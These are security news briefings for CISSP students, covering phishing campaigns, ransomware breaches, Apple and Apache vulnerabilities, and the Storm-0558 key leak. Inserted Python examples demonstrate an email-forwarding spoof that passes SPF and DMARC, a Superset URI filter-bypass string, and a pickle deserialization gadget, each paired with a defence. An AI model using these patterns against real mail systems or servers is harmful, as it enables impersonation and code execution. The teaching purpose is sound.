Les Bell and Associates Pty Ltd
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
Initial Access Broker Ramps Up MS Teams Attacks
A threat actor tracked by Microsoft as Storm-0324 (also TA543/Sagrid) has begun distributing payloads using an open-source tool called TeamsPhisher to send phishing lures through Microsoft Teams chats. Storm-0324 typically acts as an initial access broker - once it has compromised a victim, it then sells off access to other threat actors, by implanting their choice of loader, backdoor, stealer or ransomware (such as JSSLoader for ransomware-as-a-service operator FIN7).
Storm-0324 operates a sophisticated traffic distribution chain to bypass identification and filtering capabilities as they deliver phishing emails and malmails. Their emails often make references to invoices and payments, and they mimic cloud services like DocuSign, Quickbooks Online and others.
The Storm-0324 malware distribution chain typically redirects users to a SharePoint-hosted archive containing an MS Office document, a Windows Script File (.wsf) or a VBScript, which then runs malicious JavaScript to download the final malicious DLL payload. Since 2016, Storm-0324 has used a variety of first-stage payloads:
- Nymaim, a first-stage downloader and locker
- Gozi version 3, an infostealer
- Trickbot, a modular malware platform
- Gootkit, a banking trojan
- Dridex, a banking trojan
- Sage ransomware
- GandCrab ransomware
- IcedID, a modular information-stealing malware
- JSSLoader - a modular loader and infostealer
However, in July 2023, Storm-0324 began sending phishing lures over Microsoft Teams, with links leading to a malicious SharePoint-hosted file, using TeamsPhisher, a Python program that lets a user in one Teams tenant attach files to messages sent to users in external tenants. Teams flags the senders of these messages as "EXTERNAL" users (assuming the target organization has enabled external access in the first place).
Microsoft has rolled out a number of enhancements to the Accept/Block dialog in one-on-one chats within Teams, to better emphasize the external nature of a user and their email address. There are also new restrictions on the creation of domains within tenants and improved notifications to admins when new domains are created.
Microsoft makes a number of recommendations for Teams customers, including better user education, deployment of phishing-resistant authentication such as FIDO2 security keys (note that software TOTP authenticator apps, while far better than a password alone, are not phishing-resistant: a proxied login page can relay the one-time code), and allowing chat and meetings only with specific trusted organizations.
Microsoft Threat Intelligence, Malware distributor Storm-0324 facilitates ransomware access, blog post, 12 September 2023. Available online at https://www.microsoft.com/en-us/security/blog/2023/09/12/malware-distributor-storm-0324-facilitates-ransomware-access/.
CISA Releases Open Source Software Security Roadmap
The US Cybersecurity & Infrastructure Security Agency has released its Open Source Software Security Roadmap which lays out the agency's path to helping ensure a secure FLOSS ecosystem. The impact of highly-publicized vulnerabilities in open source software, and the related exploits such as Log4Shell, demonstrates that this effort could return significant benefits.
The roadmap lays out four key goals, each with subsidiary objectives:
- Establish CISA's Role in Supporting the Security of OSS
- Partner with OSS Communities
- Encourage Collective Action From Centralized OSS Entities
- Expand Engagement and Collaboration With International Partners
- Establish and Organize CISA’s OSS Work
- Drive Visibility into OSS Usage and Risks
- Understand OSS Software Prevalence
- Develop a Framework for OSS Risk Prioritization
- Conduct Risk-Informed Prioritization of OSS Projects in Federal Government and Critical Infrastructure
- Understand Threats to Critical OSS Dependencies
- Reduce Risks to the (US) Federal Government
- Evaluate Solutions to Aid in Secure Usage of OSS
- Develop Open Source Program Office Guidance For Federal Agencies
- Drive Prioritization of Federal Actions in OSS Security
- Harden the OSS Ecosystem
- Continue to Advance SBOM (Software Bill of Materials) Within OSS Supply Chains
- Foster Security Education for Open Source Developers
- Publish Guidance on OSS Security Usage Best Practices
- Foster OSS Vulnerability Disclosure and Response
The roadmap aims to address two primary classes of open-source vulnerabilities and exploits: the cascading effects of vulnerabilities in widely-used libraries and subsystems which ship as part of larger applications, and supply-chain attacks on open-source repositories, which then lead to compromise of downstream software.
The Agency is inviting feedback on its open-source efforts, at OpenSource@cisa.dhs.gov.
CISA, CISA Open Source Software Security Roadmap, resource, 12 September 2023. Available online at https://www.cisa.gov/resources-tools/resources/cisa-open-source-software-security-roadmap.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.
News Stories
CISA Warns of Apple Device Vulnerabilities
The Cybersecurity & Infrastructure Security Agency has added two new vulnerabilities to the Known Exploited Vulnerabilities Catalog, warning that "these types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise." The two vulnerabilities, which are present in iOS, iPadOS and macOS are:
- CVE-2023-41064 - a buffer overflow vulnerability in imageIO which allows remote code execution when processing a maliciously-crafted image
- CVE-2023-41061 - an input sanitization vulnerability affecting Wallet which allows remote code execution when processing a maliciously-crafted attachment
The two vulnerabilities were chained into a zero-click exploit - i.e. one requiring no interaction from the victim - used to deliver NSO Group's Pegasus spyware. The chain, which Citizen Lab has named BLASTPASS, was discovered by The Citizen Lab of the Munk School at the University of Toronto while examining the device of an individual employed by a Washington DC-based NGO with international offices.
Citizen Lab stated:
We encourage everyone who may face increased risk because of who they are or what they do to enable Lockdown Mode. We believe, and Apple’s Security Engineering and Architecture team has confirmed to us, that Lockdown Mode blocks this particular attack.
Apple has fixed the vulnerabilities in iOS 16.6.1, iPadOS 16.6.1 and macOS Ventura 13.5.2; users are encouraged to upgrade as soon as possible.
CitizenLab, BLASTPASS: NSO Group iPhone Zero-Click, Zero-Day Exploit Captured in the Wild, news release, 7 September 2023. Available online at https://citizenlab.ca/2023/09/blastpass-nso-group-iphone-zero-click-zero-day-exploit-captured-in-the-wild/.
CISA, CISA Adds Two Known Vulnerabilities to Catalog, cybersecurity advisory, 11 September 2023. Available online at https://www.cisa.gov/news-events/alerts/2023/09/11/cisa-adds-two-known-vulnerabilities-catalog.
MrTonyScam Stealer Spreads Via Facebook Messenger
A campaign to steal the Facebook and other accounts of businesses is spreading via Facebook Messenger. The campaign, dubbed "MrTonyScam", originates in Vietnam, according to Guardio Labs researcher Oleg Zaytsev, and while it relies on social engineering the victim into downloading a file attachment, unzipping it and then running the contents, it is achieving a concerning success rate, with roughly one in every 350 recipients becoming infected.
The goal is to hijack Facebook business accounts that have a good reputation, seller rating and many followers, with the intention of selling them on Telegram and other dark markets. The purchaser can then use such an account for advertising or scams. And business account owners are particularly vulnerable: while private users can happily ignore messages from unknown senders, a business cannot ignore what could be a legitimate enquiry, especially if the lure message threatens a copyright strike or other penalty. And, of course, once the stealer infects the victim, it can also gather credentials for other accounts - banks, cloud-hosted accounting, email, e-commerce platforms, etc. - from the browser's cookies and stored passwords.
The attack delivers an archive file - .rar or .zip - which the recipient is lured to download and open to reveal a batch file. This is a first-stage dropper which, if run, downloads a stage 2 dropper from GitHub. This, in turn, starts the Chrome browser, pointing it to the Alibaba web site as a distraction, while in the background it downloads additional components and starts the main stealer, called project.py, in a standalone Python environment and makes it persistent via a startup batch file.
Once running, the stealer extracts all cookies and login credentials from the victim's browsers, sending them to a Telegram channel via the Telegram/Discord bot API, and then deletes all the cookies, locking the victim out of their accounts and giving the scammers time to hijack the session and change the password. The code uses a variety of obfuscation and detection evasion techniques, but the presence of Vietnamese-language comments in the code, and the inclusion of the "Coc Coc" Chromium-based browser, popular in Vietnam, betray its origin.
The Guardio blog post provides a comprehensive analysis and IOCs, but the basic message, and mitigation technique, is obvious: don't just double-click on Facebook Messenger attachments, and treat archive files as highly suspicious.
Zaytsev, Oleg, “MrTonyScam” - Botnet of Facebook Users Launch High-Intent Messenger Phishing Attack on Business Accounts, blog post, 11 September 2023. Available online at https://labs.guard.io/mrtonyscam-botnet-of-facebook-users-launch-high-intent-messenger-phishing-attack-on-business-3182cfb12f4d.
News Stories
Dymocks Latest Ransomware Victim
Australian bookstore chain Dymocks is the latest victim of a ransomware attack. In an email titled "Important Update About Your Dymocks Information", sent to customers on Friday afternoon (8 September), the firm disclosed that on 6 September it had become aware of discussions regarding its customer records being made available on the dark web.
At the time the email was sent, the company was unaware of the precise nature of the attack or which customers were affected, but the information they hold includes:
- date of birth
- postal address
- email address
- mobile number
- gender
- membership details such as gold expiry date, account status, member created date and card ranking
Dymocks does not store credit card or other financial data, but what it does hold could form the basis of scams and identity fraud. Dymocks' email provides the usual guidance such as changing passwords, monitoring bank statements, and being alert to scams.
Have I Been Pwned, however, dates the breach to June 2023 and puts the data set at 1.2 million records containing 836,120 unique email addresses.
Dymocks Pty Ltd, Important Update About Your Dymocks Information, email, 8 September 2023.
Scammers Can Abuse Email Forwarding
In a paper presented at the 8th IEEE European Symposium on Security and Privacy in July - winning the best paper award - researchers from UC San Diego, Stanford and the University of Twente revealed that flaws in how major email services process the forwarding of email can make it easier for email scam and phishing operators to impersonate legitimate email addresses at high-profile domains.
The basic problem is that spam filtering techniques mostly work on the assumption that each Internet domain operates its own email infrastructure so that, for example, a reverse DNS lookup for a connecting IP address (using the PTR resource record) will return a hostname that matches a host in the same domain. More advanced protections such as SPF (Sender Policy Framework) and DKIM (DomainKeys Identified Mail) implicitly incorporate this assumption.
However, most enterprises today have outsourced their email infrastructure to a few very large service providers - most notably Microsoft (outlook.com) and Google (gmail.com) - and while these companies validate that their users only send email on behalf of the domains they operate, this validation can be bypassed by email forwarding.
Forwarding is both ubiquitous and necessary in the email ecosystem, due to the wide use of email filtering services, mailing lists and autoforwarding employed by individual users and small and medium enterprises, who often use a web hosting account to forward inbound email to their Outlook or Gmail account.
The researchers identified four different approaches in the way mail services rewrite the sender and recipient fields in the SMTP envelope and email headers while forwarding an email to its recipient. Using the domain of the US Department of State (state.gov) as an example, they showed how an attacker can create a spoofed email with a fake identity which appears to come from the Department, and then forward it through their personal Outlook account. To the recipient, this will appear legitimate, since it comes from an Outlook email server - and the Department of State uses Outlook as its email provider.
This works because, almost uniquely, Outlook uses a custom forwarding implementation which the researchers term "MAIL FROM Equals FROM" (MFEF). This not only rewrites the SMTP envelope recipient (RCPT TO) to the final recipient, to whom the email is being forwarded, but also sets the envelope sender (MAIL FROM) - the identity SPF is evaluated against - to match the message's From: header. Plain forwarding breaks SPF, because the forwarding host is not authorised to send for the original sender's domain; that and similar problems have hindered the adoption of SPF and DMARC and pushed email providers towards customised schemes such as MFEF. In the spoofing case, the rewritten MAIL FROM names the impersonated domain, and that domain's SPF record authorises Outlook's servers, so the forwarded message passes SPF at the recipient.
Variants of this flaw affect five other email providers including iCloud, while smaller issues impact users of Gmail and Zoho Mail, a popular Indian email provider. The researchers disclosed the vulnerabilities to the various providers, some of whom have fixed the issues or are at least working on them.
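The following toy model of MFEF forwarding is an added illustration, not code from the paper or from any mail provider. It assumes a hypothetical domain victim.example that has outsourced its mail to bigmail.example (as state.gov has to Outlook), constructed IP addresses and SPF policies, and an attacker-owned mailbox at bigmail.example that auto-forwards; nothing is looked up in DNS. It shows why a spoofed message forwarded the MFEF way passes both SPF and DMARC alignment at the final recipient, whereas SRS-style rewriting passes SPF only for the forwarder's own domain:

```python
"""Toy model of Outlook-style 'MAIL FROM Equals FROM' (MFEF) forwarding and why a
spoofed message passes SPF and DMARC alignment at the final recipient.

Added example, not code from the paper or from any mail provider. All domains,
IP addresses and SPF policies are constructed; nothing is looked up in DNS."""
from dataclasses import dataclass, replace

# Constructed stand-in for SPF TXT records: domain -> IPs allowed to send for it.
# victim.example has outsourced its mail to bigmail.example, so bigmail's outbound
# IPs are authorised in victim.example's own SPF record.
SPF_RECORDS = {
    "victim.example":   {"203.0.113.10", "203.0.113.11"},
    "bigmail.example":  {"203.0.113.10", "203.0.113.11"},
    "attacker.example": {"198.51.100.5"},
}

@dataclass(frozen=True)
class Message:
    mail_from: str    # SMTP envelope sender (MAIL FROM): what SPF is evaluated against
    rcpt_to: str      # SMTP envelope recipient (RCPT TO)
    header_from: str  # RFC 5322 From: header: what the user sees, what DMARC aligns on
    source_ip: str    # IP of the host handing the message to the receiving server

def domain_of(addr: str) -> str:
    return addr.rsplit("@", 1)[1].lower()

def spf_check(msg: Message) -> tuple:
    """Minimal SPF: 'pass' if the delivering IP is authorised for the MAIL FROM domain.
    Returns (result, domain the result applies to)."""
    dom = domain_of(msg.mail_from)
    return ("pass" if msg.source_ip in SPF_RECORDS.get(dom, set()) else "fail", dom)

def dmarc_spf_aligned(msg: Message) -> bool:
    """DMARC's SPF alignment: SPF must pass AND its domain must match the From: header."""
    result, dom = spf_check(msg)
    return result == "pass" and dom == domain_of(msg.header_from)

def forward_mfef(msg: Message, new_rcpt: str, fwd_ip: str) -> Message:
    """MFEF forwarding: envelope sender rewritten to equal the From: header."""
    return replace(msg, mail_from=msg.header_from, rcpt_to=new_rcpt, source_ip=fwd_ip)

def forward_srs(msg: Message, new_rcpt: str, fwd_ip: str, fwd_domain: str) -> Message:
    """SRS-style forwarding: envelope sender rewritten into the forwarder's own domain,
    so SPF passes for the forwarder, not for the domain in the From: header."""
    local, dom = msg.mail_from.split("@", 1)
    return replace(msg, mail_from=f"SRS0={dom}={local}@{fwd_domain}",
                   rcpt_to=new_rcpt, source_ip=fwd_ip)

def attack_scenario(forwarding: str) -> tuple:
    """Attacker sends a message with a spoofed From: into their own bigmail mailbox,
    which auto-forwards it to the real target through bigmail's outbound server.
    Returns (SPF result seen by the target, whether it is DMARC-aligned)."""
    spoofed = Message(mail_from="attacker@attacker.example",
                      rcpt_to="attacker-owned@bigmail.example",
                      header_from="official@victim.example",
                      source_ip="198.51.100.5")
    if forwarding == "mfef":
        fwd = forward_mfef(spoofed, "target@third.example", "203.0.113.10")
    else:
        fwd = forward_srs(spoofed, "target@third.example", "203.0.113.10", "bigmail.example")
    return spf_check(fwd)[0], dmarc_spf_aligned(fwd)

if __name__ == "__main__":
    direct = Message("official@victim.example", "target@third.example",
                     "official@victim.example", "198.51.100.5")
    print("direct spoof :", spf_check(direct))        # ('fail', 'victim.example')
    print("MFEF forward :", attack_scenario("mfef"))  # ('pass', True): looks authentic
    print("SRS forward  :", attack_scenario("srs"))   # ('pass', False): not aligned
```

The practical check for a receiving domain is the last case: a DMARC policy that requires alignment rejects the SRS-forwarded spoof but is powerless against the MFEF one, because the forwarder has made the envelope sender agree with the forged From: header and the impersonated domain has (legitimately) authorised the forwarder's servers.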
Liu, Enze, et al., Forward Pass: On the Security Implications of Email Forwarding Mechanism and Policy, Proc. 8th IEEE European Symposium on Security and Privacy, 3 - 7 July 2023, Delft. Available online at https://arxiv.org/abs/2302.07287.
Patringenaru, Ioana, Scammers Can Abuse Security Flaws in Email Forwarding to Impersonate High-profile Domains, UC San Diego Today, 5 September 2023. Available online at https://today.ucsd.edu/story/forwarding_based_spoofing.
China Ramps Up Cyber-Espionage, Disinformation Campaigns
A new report from Microsoft Threat Intelligence warns that China has ramped up both its cyber-espionage efforts against the US defence and critical infrastructure sectors, and its online influence operations to destabilise the US political environment.
The operations by China-affiliate threat actors have focused on three areas in particular:
- The South China Sea and Taiwan, reflecting conflicts over territorial claims, rising tensions across the Taiwan Strait, and increased US military presence in the region
- The US defence industrial base, particularly enterprises with any connection to the satellite and telecommunications facilities associated with the US Marine Corps base in Guam
- US critical infrastructure across multiple sectors including transportation, utilities, medical (e.g. hospitals) and telecommunications, particularly with the potential to disrupt US-Asia communications
China has also become significantly more effective in engaging social media users with influence operations, switching from a strategy of deluging social networks via bots to engaging directly with authentic users, targeting specific candidates in content about US elections and posing as US voters. Microsoft estimates that this initiative has successfully engaged target audiences in at least 40 languages and grown its audience to over 103 million.
The operators behind some of these social media accounts have begun using generative AI to create visual content which is more eye-catching than the memes used in previous campaigns. Authentic users often repost these, despite their obvious clues of AI generation, such as more than five fingers on the torch-holding hand of the Statue of Liberty. Other accounts pose as independent social media influencers, despite being employed by Chinese state media in what the Chinese Communist Party terms "multilingual internet celebrity studios".
In online news media, Chinese state media has been artfully positioning itself as the authoritative voice in international discourse on China, using a variety of means to exert influence in media outlets worldwide, such as localized news websites which push Chinese Communist Party propaganda to the Chinese diaspora in over 35 countries.
The report also covers increasingly sophisticated operations by North Korea, as the regime has set high-priority requirements for its cyber-espionage operations, particularly for maritime technologies, as well as increasing cryptocurrency theft and supply chain attacks.
Microsoft Threat Intelligence, Digital threats from East Asia increase in breadth and effectiveness, report, 7 September 2023. Available online at https://www.microsoft.com/en-us/security/business/security-insider/reports/nation-state-reports/digital-threats-from-east-asia-increase-in-breadth-and-effectiveness/ (full report PDF at https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RW1aFyW).
News Stories
Mirai Derivative Exploits Android TVs
Russian anti-malware company Dr. Web reports the identification of a new family of trojans that compromises Android TV devices, either during firmware updates or when applications for watching pirated video content are installed. This new backdoor sports advanced DDoS attack capabilities by using code from the Mirai botnet trojan.
Dubbed Android.Pandora.2, the trojan seems to be a modification of the Android.Pandora.10 backdoor (also known as Android.Backdoor.334). It targets low-end Android TV set-top boxes such as the Tanix TX6 TV Box, MX10 Pro 6K and H96 MAX X3. An analysed sample arrived as a malicious firmware update - released in December 2015 (!) - for the MTX HTV BOX HTV3 device and has likely been deployed to a number of websites. Other samples target Spanish-speaking users via apps for streaming pirated movies and TV shows, offered on domains with names like 'youcine', 'magistv', 'latinatv' and 'unitv'; this variant has a different installation process and is identified as Android.Pandora.4.
The main malware is a file called /system/bin/pandoraspearrk, which joins the infected system to a DDoS botnet; it is monitored by a process called /system/bin/supervisord which will restart it if it is killed. It also installs its own copies of the busybox shell and curl. Once installed and running, the trojan will accept commands to start and stop various DDoS attacks, open a reverse shell, mount partitions in RW mode, etc.
This malware illustrates the dangers posed by IoT device users who know just enough to side-load their devices with code from dubious sources but not enough to secure them; they may well get cheap functionality and access to pirated content, but their devices can become useful platforms for attackers interested in bigger fish.
Dr. Web, Pandora's box is now open: the well-known Mirai trojan arrives in a new disguise to Android-based TV sets and TV boxes, news release, 6 September 2023. Available online at https://news.drweb.com/show/?lng=en&i=14743.
Apache Project Vulnerabilities
Two Apache projects are causing problems in the enterprise world.
The first is Apache RocketMQ, a distributed messaging and streaming middleware system; CISA has added CVE-2023-33246 in RocketMQ to its Known Exploited Vulnerabilities catalog. Several components of RocketMQ, including NameServer, Broker and Controller, are often exposed via an extranet but lack permission verification; an attacker can exploit this by using the 'update configuration' function to execute commands with the privileges of the RocketMQ system account. Alternatively, they can achieve remote command execution by forging RocketMQ protocol messages.
Affected users should upgrade to RocketMQ version 5.1.1 or above, or RocketMQ version 4.9.6 or above.
Meanwhile, researchers at Horizon3.ai warn of vulnerabilities in Apache Superset, a popular Python open source data exploration and visualization tool based on the Flask web framework. A previous vulnerability, CVE-2023-27524 (also discovered by Horizon3.ai), could allow an attacker to obtain the Flask SECRET_KEY value and thereby obtain admin privileges, but this was mostly fixed in Superset 2.1.0. The two new high-severity vulnerabilities, CVE-2023-39265 and CVE-2023-37941, allow further exploitation - in some cases after using CVE-2023-27524 or other means of obtaining admin privileges, but in others from non-admin accounts.
CVE-2023-39265 allows a bypass of URI checking in the Superset UI, which would normally block connection to its own metadata database (which is SQLite, by default). The checks fail if the supplied URI includes both the dialect and driver name, e.g.
sqlite+pysqlite:////app/superset_home/superset.db
After connecting to the metadata store, an attacker can then access it via SQL Lab, allowing database exploration, querying and updates. The same vulnerability also applies to database connection information imported from files, allowing control of arbitrary SQLite metadata databases. In fact, if Superset is configured to use MySQL for the metadata database, it is also possible to obtain credentials for that database and connect to it through the Superset UI.
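The check-bypass pattern above is worth seeing in code. The following is an added example, not Superset's own code: a naive check that string-matches the bare "sqlite://" scheme, beside a check that parses the URL and compares only the dialect (the part of a SQLAlchemy scheme before any "+driver"). The BLOCKED_DIALECTS policy is a hypothetical stand-in for Superset's own rule:

```python
"""Prefix matching on a database URI versus parsing out the dialect.

Added example, not Superset's code. SQLAlchemy URLs carry 'dialect' or
'dialect+driver' as the URL scheme, so a check that looks for the literal
'sqlite://' is blind to 'sqlite+pysqlite://'."""
from urllib.parse import urlsplit

# Hypothetical policy: never let a user attach the app's own metadata store.
BLOCKED_DIALECTS = {"sqlite"}

def naive_is_blocked(uri: str) -> bool:
    """The fragile version: literal scheme prefix, case-folded."""
    return uri.lower().startswith("sqlite://")

def dialect_of(uri: str) -> str:
    """Return the SQLAlchemy dialect name from a database URL.

    urlsplit() accepts '+' inside a scheme, so 'sqlite+pysqlite:///x' yields the
    scheme 'sqlite+pysqlite'; the dialect is everything before the first '+'."""
    scheme = urlsplit(uri).scheme.lower()
    if not scheme:
        raise ValueError("not a database URL: missing scheme")
    return scheme.split("+", 1)[0]

def hardened_is_blocked(uri: str) -> bool:
    """Compare on the parsed dialect, not on how the user chose to spell the scheme."""
    return dialect_of(uri) in BLOCKED_DIALECTS

def compare(uri: str) -> dict:
    """Run both checks on one URI so the gap between them is visible."""
    return {"uri": uri, "naive": naive_is_blocked(uri), "hardened": hardened_is_blocked(uri)}

if __name__ == "__main__":
    for u in ("sqlite:////app/superset_home/superset.db",
              "sqlite+pysqlite:////app/superset_home/superset.db",   # the bypass
              "SQLite+pysqlite:////app/superset_home/superset.db",
              "mysql+pymysql://analyst:pw@db.internal/warehouse"):
        print(compare(u))
```

The general lesson is the one that recurs in every URL- or path-based allow/deny check: parse the input into the same structure the consumer (here, SQLAlchemy) will see, and make the policy decision on that structure rather than on the raw string.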
CVE-2023-37941 extends this attack chain further, allowing remote code execution by an attacker with access to the metadata database. Vulnerable versions of Superset use Python's pickle package to store some configuration data, and the attacker can insert an arbitrary pickle payload into the database and then trigger its deserialization and execution.
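The pickle problem is general, not specific to Superset: pickle.loads() runs whatever callables the byte stream names. The following added example (not Superset's code) constructs a harmless payload whose unpickling calls os.getcwd, shows that a trusting loader executes it, and shows a restricted Unpickler that refuses any global outside a small allow-list. The allow-list itself is a hypothetical choice for the example; for configuration data, a non-code format such as JSON is the better fix:

```python
"""Unpickling attacker-controlled bytes executes code; restrict what can be resolved.

Added example, not Superset's code. The payload is constructed and calls
os.getcwd, a harmless stand-in for whatever an attacker would really call."""
import io
import os
import pickle

class Gadget:
    """Constructed object whose pickled form instructs the loader to call a function."""
    def __reduce__(self):
        # pickle stores this as 'call os.getcwd with no arguments' (a REDUCE opcode)
        return (os.getcwd, ())

def make_payload() -> bytes:
    return pickle.dumps(Gadget())

def vulnerable_load(data: bytes):
    """What an application does when it trusts bytes read back from its own database."""
    return pickle.loads(data)

class RestrictedUnpickler(pickle.Unpickler):
    """Resolve only an explicit allow-list of (module, name) globals; refuse the rest."""
    ALLOWED = {("builtins", "dict"), ("builtins", "list"), ("builtins", "set"),
               ("builtins", "frozenset")}   # hypothetical allow-list for the example

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing to resolve {module}.{name}")

def hardened_load(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()

def benign_roundtrip() -> dict:
    """Ordinary data still loads through the restricted unpickler."""
    return hardened_load(pickle.dumps({"theme": "dark", "limits": [10, 20]}))

def demo() -> tuple:
    """Returns (did the trusting loader run the payload, did the hardened loader block it)."""
    payload = make_payload()
    ran = vulnerable_load(payload) == os.getcwd()   # the loader called os.getcwd for us
    try:
        hardened_load(payload)
        blocked = False
    except pickle.UnpicklingError:
        blocked = True
    return ran, blocked

if __name__ == "__main__":
    print(demo())             # (True, True)
    print(benign_roundtrip())
```

Note that the allow-list approach only narrows the attack surface to whatever you permit; any permitted callable with side effects is still reachable, which is why storing configuration as JSON (and validating it on load) is the cleaner design.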
These vulnerabilities are fixed in Superset version 2.1.1, and users should upgrade immediately.
CISA, CISA Adds One Known Vulnerability to Catalog, cybersecurity advisory, 6 September 2023. Available online at https://www.cisa.gov/news-events/alerts/2023/09/06/cisa-adds-one-known-vulnerability-catalog.
Sunkavally, Naveen, Apache Superset Part II: RCE, Credential Harvesting and More, blog post, 6 September 2023. Available online at https://www.horizon3.ai/apache-superset-part-ii-rce-credential-harvesting-and-more/.
Multiple Nation State Actors Exploit Zoho ManageEngine ServiceDesk Plus
Back in June, we reported on a campaign conducted by China-affiliated threat actor VANGUARD PANDA (also known as Volt Typhoon), exploiting Zoho ManageEngine ADSelfService Plus in order to obtain initial access, after which they deployed webshells and made use of living-off-the-land techniques to avoid leaving behind detectable artifacts which could be used as IOCs.
Now the US Cybersecurity & Infrastructure Security Agency, FBI and Cyber National Mission Force have published a joint cybersecurity advisory providing information on an incident which appears to be related. The agencies confirmed that a nation-state advanced persistent threat exploited CVE-2022-47966 (an RCE vulnerability stemming from an outdated version of yet another Apache project, the Santuario xmlsec library) to gain unauthorized access to a public-facing application (Zoho ManageEngine ServiceDesk Plus), establish persistence, and move laterally through the network of an aviation sector entity. Additional APT actors were also observed exploiting CVE-2022-42475 to establish a presence on the organization's firewall device.
The joint advisory provides a full, detailed analysis of initial access vectors and post-exploitation activities, including the tools the threat actor used, along with a mapping to MITRE ATT&CK techniques, detection methods and suggested mitigations.
CISA, Multiple Nation-State Threat Actors Exploit CVE-2022-47966 and CVE-2022-42475, cybersecurity advisory, 7 September 2023. Available online at https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-250a.
News Stories
BlackCat/ALPHV Claims More Scalps
Russian ransomware operation BlackCat, also known as ALPHV, has claimed a string of new scalps in Australia, apparently through the compromise of a cloud service reseller. The group claims to have stolen over 4.95 TB (yes - that's terabytes) of data belonging to several companies:
- TissuPath, a pathology company
- Strata Plan, a property owners' corporation service provider
- Barry Plant Blackburn, a real estate agency
- Tisher Liner FC Law, a business and property law firm
The group is threatening to publish the data unless an extortion demand is paid. The nature of the data is unclear - much of it is undoubtedly financial data relating to real estate property owners, but TissuPath has stated that patient names, dates of birth, contact details, Medicare numbers and private health insurance details were exposed. TissuPath also stated that its main database and reporting system was not compromised, and that the firm does not store patient financial data or identity documents such as driver's licence numbers.
Three of the firms above are clients of Core Desktop, a South Melbourne firm which provides managed services for Azure and Office 365. The firm first became aware of the breach on 22 August 2023 and, while uncertain of the initial compromise techniques, has shut down access to affected accounts, and reset administrator login credentials and client passwords to regain control of its systems.
The breach has been reported to the Office of the Australian Information Commissioner and the Australian Cyber Security Centre.
Tran, Danny, Russian ransomware gang AlphV targets pathology company, law firms in latest string of attacks, ABC News, 5 September 2023. Available online at https://www.abc.net.au/news/2023-09-05/russian-ransomware-gang-alphv-targets-pathology-company-law-firm/102817900.
CISA Vulnerability Summary for the Week of 28 August
CISA has released its weekly vulnerability summary, and as usual it makes interesting reading. Even just a quick scan of those vulnerabilities with a CVSS score of 9.8 - about as bad as it gets - turns up some informative entries, such as an authentication bypass in the Stripe Payment Plugin for WooCommerce, a WordPress plugin (up to and including v3.7.7), which allows unauthenticated actors to log in as any user who has placed an order. There's another authentication bypass vulnerability in VMware's Aria Operations for Networks, which allows access to the command line interface via SSH.
The Internet of Things continues to provide examples of just how bad things can be, with four vulnerabilities in SpotCam FHD 2 wireless security cameras, including hard-coded credentials for both a hidden telnet server and for uBoot, as well as remote command injection.
Security-related products are, unfortunately, not immune, with a deserialization vulnerability, possibly allowing remote code execution, in the weblogic-framework WebLogic vulnerability scanner (a third-party testing tool, not an Oracle product), and a remote code execution vulnerability in Splunk Enterprise.
There's plenty to think about in the lower-scoring vulnerabilities, too.
CISA, Vulnerability Summary for the Week of August 28, 2023, security bulletin, 6 September 2023. Available online at https://www.cisa.gov/news-events/bulletins/sb23-249.
How Storm-0558 Got That Key
Back in July, we covered a series of attacks on US government agencies which were achieved using forged authentication tokens for Outlook Web Access in Exchange Online and Outlook.com. The threat actor involved, dubbed Storm-0558 by Microsoft, was able to sign the forged tokens using an acquired Microsoft account (MSA) consumer signing key, which was accepted for enterprise systems due to a token validation vulnerability. The attack was so significant that the Department of Homeland Security's Cyber Safety Review Board announced plans for an in-depth review of the malicious targeting of cloud computing environments, with the intention of strengthening identity management and authentication in the cloud.
However, one question remained unanswered: how did Storm-0558 obtain the Microsoft account consumer key in the first place? Such highly-trusted keys are normally subject to strong controls to prevent their being leaked.
Now, Microsoft Security Research Center has provided details of their technical investigation. As one would expect, Microsoft's production environment does have strong controls, including dedicated accounts, secure access workstations, and the use of multi-factor authentication based on hardware tokens. The production environment also prevents the use of email, conferencing, web research and other collaboration tools that commonly provide a path for malware infections. However, some data does leave the production environment.
The MSRC investigation revealed that a consumer signing system crash in April 2021 produced a process memory dump (a 'crash dump') of the crashed process. Crash dumps are supposed to redact sensitive information and should not include the signing key, but in this particular case, a race condition allowed the key to remain in the crash dump, and its presence there was not subsequently detected.
The crash dump was then moved from the isolated production network into a debugging environment on the Internet-connected corporate network. At some time after this, Storm-0558 was able to compromise the account of a Microsoft engineer, which gave them access to the debugging environment, the crash dump and the key. Although the logs from that time have not been retained, this seems the most likely way the threat actor obtained the key.
Microsoft states that the issues that allowed the key to leak via this improbable path - the race condition and the failure to detect the key in the crash dump in either the production or debugging environments - have now been corrected. This might have been a one-in-a-million exposure, but as Sir Terry Pratchett wryly observed, the strange thing about one-in-a-million events is that they happen so often.
MSRC, Results of Major Technical Investigations for Storm-0558 Key Acquisition, blog post, 6 September 2023. Available online at https://msrc.microsoft.com/blog/2023/09/results-of-major-technical-investigations-for-storm-0558-key-acquisition/.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.
News Stories
Twitter/X Collects More Personal Data
As Elon Musk plans to expand X - the social network formerly known as Twitter - into a do-everything social network, the platform has revised its privacy policy to reflect its plans to collect additional personal data from and about its users.
